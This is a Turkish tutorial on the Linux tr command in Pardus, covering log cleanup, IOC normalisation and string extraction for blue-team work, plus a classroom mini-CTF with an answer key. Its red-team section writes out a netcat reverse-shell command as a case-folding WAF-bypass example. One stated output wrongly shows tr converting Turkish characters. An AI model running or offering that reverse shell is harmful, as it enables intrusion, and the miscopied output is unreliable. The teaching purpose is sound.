Pardus Linux’ta tr Komutu
Linux sistemlerinde metin işleme, siber güvenlik analizlerinin temel taşlarından biridir. Log analizi, veri temizleme, IOC (Indicator of Compromise) inceleme ve zararlı veri dönüşümlerinde sıkça kullanılan araçlardan biri de tr komutudur.
Pardus Linux gibi Debian tabanlı sistemlerde tr, metin içindeki karakterleri dönüştürmek, silmek veya sıkıştırmak için kullanılır.
⚙️ tr Komutu Nedir?
tr (translate), standart girdiden aldığı veriyi karakter bazında işler ve çıktıya dönüştürür.
📌 Önemli nokta:
Dosya üzerinde doğrudan çalışmaz
Pipe (
|) ile kullanılırKarakter seviyesinde çalışır (kelime veya satır değil)
🧪 Temel Kullanım Yapısı
tr [seçenek] SET1 [SET2]
🔤 1. Karakter Dönüştürme (Translate)
Küçük harfi büyük harfe çevirme
echo "siber güvenlik" | tr 'a-z' 'A-Z'
🔎 Çıktı:
SİBER GÜVENLİK
📌 Siber güvenlikte kullanım:
Log normalize etme
Case-sensitive analizleri standardize etme
🧹 2. Karakter Silme (Delete Mode)
Sayıları loglardan temizleme
echo "user123 logged in at 10:45" | tr -d '0-9'
🔎 Çıktı:
user logged in at :
📌 Siber güvenlik kullanımı:
IP adreslerinden sayıları temizleyerek pattern analizi
IOC temizleme
Gürültü azaltma
🧩 3. Tekrarlayan Karakterleri Sıkıştırma
Fazla boşlukları temizleme
echo "log file analysis" | tr -s ' '
🔎 Çıktı:
log file analysis
📌 Siber güvenlik kullanımı:
Normalize edilmiş log parsing
SIEM sistemlerine veri hazırlama
🔐 4. Güvenlik Odaklı Örnek: Log Analizi
Apache/Nginx log temizleme
cat access.log | tr -d '"' | tr -s ' '
📌 Amaç:
Gereksiz karakterleri temizlemek
Log formatını analiz edilebilir hale getirmek
🧠 5. IOC Analizi ile Kullanım
Bir zararlı IP listesini sadeleştirme:
cat ioc.txt | tr -d ' ' | tr ',' '\n'
📌 Kullanım:
IOC normalize etme
Threat intelligence veri hazırlama
🛡️ 6. Siber Güvenlikte tr Komutunun Rolü
🔍 1. Log Analizi
Web server loglarını temizleme
SIEM araçlarına veri hazırlama
🧪 2. Malware Analizi
Obfuscation çözme (basit encoding temizleme)
String normalizasyonu
🧹 3. Veri Temizleme
IOC listelerini standardize etme
Gürültü azaltma
🧬 4. Forensics (Adli Bilişim)
Delil loglarının düzenlenmesi
Zaman damgalarının ayrıştırılması
⚠️ Sınırlamalar
tr güçlü ama basittir:
Regex desteklemez ❌
Kelime bazlı işlem yapmaz ❌
Dosya düzenleme yapmaz ❌
📌 Daha gelişmiş işlemler için:
awksedgrep
kullanılır.
🔥 Gerçek Siber Güvenlik Senaryosu
Şüpheli log temizleme
cat auth.log | tr -s ' ' | tr -d ':' | tr 'A-Z' 'a-z'
📌 Amaç:
Logları normalize etmek
Saldırı tespiti için veri hazırlamak
📌 Sonuç
Pardus Linux üzerinde tr komutu, basit görünmesine rağmen siber güvenlikte:
Veri temizleme
Log analizi
IOC düzenleme
Threat intelligence hazırlığı
gibi kritik alanlarda aktif olarak kullanılır.
🧭 Öneri (Siber Güvenlik Öğrenme Yolu)
Eğer bu konuyu ilerletmek istiyorsan sırayla şunları öğrenmelisin:
tr(karakter işlemleri)grep(arama ve filtreleme)sed(akış düzenleme)awk(ileri log analizi)ELK Stack / SIEM sistemleri
Siber güvenlik operasyonlarında hız, genellikle hayatta kalmak anlamına gelir. Bir olaya müdahale ederken (Blue Team) veya bir sistemdeki güvenlik duvarlarını atlatmaya çalışırken (Red Team), devasa veri yığınlarını saniyeler içinde işlemek zorundasınız. Bu makalede, Pardus Linux terminalinde tr komutunun operasyonel sahadaki kullanım senaryolarını inceleyeceğiz.
1. Blue Team (Mavi Takım) Operasyonları: İz Sürme ve Analiz
Savunma takımlarının en büyük kabusu, saldırganlar tarafından kasıtlı olarak bozulmuş (obfuscated) veya anlamsız karakterlerle (NULL byte'lar vb.) doldurulmuş log dosyaları ve zararlı ikili (binary) dosyalardır. tr komutu, bu gürültüyü filtrelemek için mükemmel bir araçtır.
Görev 1.1: Zararlı Yazılım İçerisindeki Okunabilir Metinleri Çıkarma (Strings Analysis)
Bir saldırı sonrası şüpheli bir ELF (çalıştırılabilir Linux dosyası) ele geçirdiniz. Dosyanın içindeki komutları, IP adreslerini veya URL'leri görmek istiyorsunuz, ancak cat komutu terminali bozan anlamsız karakterler basıyor.
Sadece ASCII standartlarında okunabilir (printable) karakterleri filtrelemek için:
cat supheli_zararli.elf | tr -cd '[:print:]\n' > okunabilir_dizgiler.txt
Bu komutta -c (complement) ve -d (delete) parametreleri birleşerek "Okunabilir karakterler ([:print:]) ve alt satır (\n) HARİCİNDEKİ her şeyi sil" talimatını verir. Blue Team, oluşan yeni dosya üzerinden grep ile şüpheli IP'leri arayabilir.
Görev 1.2: Parçalanmış Log Kayıtlarını Birleştirme
Saldırgan, komut geçmişini veya sistem loglarını alt alta boş satırlarla bölerek analizi zorlaştırmış olabilir. Tekrarlayan boşlukları veya satır sonlarını tekilleştirmek için -s (squeeze) kullanılır:
cat bozulmus_auth.log | tr -s '\n' > temiz_auth.log
2. Red Team (Kırmızı Takım) Operasyonları: Gizlenme ve Taarruz
Saldırı simülasyonlarında, oluşturulan payload'ların hedef sistemin kısıtlamalarına uyması gerekir. Hedef sistemdeki bir web uygulaması veya terminal, sadece belirli formatta veri kabul ediyor olabilir.
Görev 2.1: Dinamik Parola / Dizi (String) Üretimi
Büyük Final etkinliğindeki parolaları veya "Flag"leri (bayrakları) sistemde otomatik olarak oluşturmanız gerektiğinde, Linux'un rastgele veri üreteci olan /dev/urandom dosyasını tr ile filtreleyebilirsiniz:
# Sadece harf ve rakamlardan oluşan 16 karakterli rastgele bir parola/bayrak üretme
cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 16 | head -n 1
Bu komut, urandom'dan gelen anlamsız veriyi sadece alfanümerik karakterler kalacak şekilde kırpar (tr -dc), fold ile 16 karakterde bir satırı böler ve head ile ilk satırı alır.
Görev 2.2: WAF (Web Application Firewall) Atlatma Taktikleri
Bazı basit güvenlik duvarları, yalnızca "SELECT", "UNION", "bash" gibi belirli kelimeleri küçük harflerle arar. Red Team, komut enjeksiyonu yaparken bu filtreleri atlatmak için karakter setlerini anında dönüştürebilir:
# Payload'daki küçük harfleri büyük harfe çevirerek imza tabanlı (signature-based) WAF atlatma
echo "nc -e /bin/bash 192.168.1.50 4444" | tr '[:lower:]' '[:upper:]'
Çıktı: NC -E /BIN/BASH 192.168.1.50 4444 (Not: Çoğu Linux komutu büyük harfle çalışmaz, ancak Windows sistemlere veya case-insensitive çalışan SQL veritabanlarına yönelik enjeksiyonlarda bu teknik çok etkilidir.)
3. Büyük Final İçin Sınıf İçi Mini-CTF Senaryosu
Öğrencilerinizin öğrendiklerini pekiştirmesi için şu uygulamayı laboratuvarda gerçekleştirebilirsiniz:
Senaryo Başlangıcı: Kırmızı Takım, sistemde gizli_mesaj.txt adında bir dosya bıraktı. Ancak mesaj şu şekilde kriptolanmış ve arasına gereksiz semboller eklenmiştir:
#$V^#y$v@1^#6@*t$1#r%u_#f*1#o!3#e_%t@h@i#e!a#y@1*x#
Mavi Takımın Görevi (Çözüm Adımları):
Önce
tr -dile sembolleri temizle (#,$,@,^,*,%,!,_).Kalan metne ROT13 deşifresi uygula.
(Cevap anahtarı için öğrencilerden beklenen terminal komutu zinciri:)
echo "#\$V^#y\$v@1^#6@*t\$1#r%u_#f*1#o!3#e_%t@h@i#e!a#y@1*x#" | tr -d '#$@^*%!_' | tr 'A-Za-z' 'N-ZA-Mn-za-m'
Yorumlar